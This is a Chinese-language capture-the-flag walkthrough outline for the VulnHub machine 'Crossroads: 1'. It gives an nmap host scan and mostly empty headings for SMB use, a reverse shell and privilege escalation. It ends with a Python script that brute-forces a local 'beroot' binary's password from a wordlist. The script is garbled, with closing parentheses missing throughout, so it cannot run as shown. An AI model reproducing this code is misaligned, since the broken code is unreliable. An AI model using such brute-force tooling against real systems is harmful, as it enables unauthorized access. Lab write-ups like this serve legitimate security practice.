准备:
靶机:Crossroads: 1,下载地址:https://download.vulnhub.com/crossroads/crossroads_vh.ova,下载后直接vbox打开即可。
一:信息收集
1.nmap扫描
使用nmap扫描下靶机地址,命令:nmap -sn 192.168.5.0/24,发现靶机地址:192.168.5.159。
2.目录扫描
3.stegoveritas工具使用
4.smb服务
二 :信息利用
1.smb服务利用
2.shell反弹
3.逆向
三:提权
1.脚本编写
bp.py
import subprocess
import os
import time
import sys
path = '/usr/bin/echo'
content = "wrong password!!"
blank = " "
executable = "beroot"
def broot(:
os.system("export TERM=xterm"
with open("pass","r",encoding="ISO-8859-1" as file:
words = file.read(.splitlines(
for word in words:
execute = subprocess.getoutput(path + blank + (str(word + " | ./" + executable
print(execute
if content not in execute:
print("[!]Password:" + word
sys.exit(0
broot(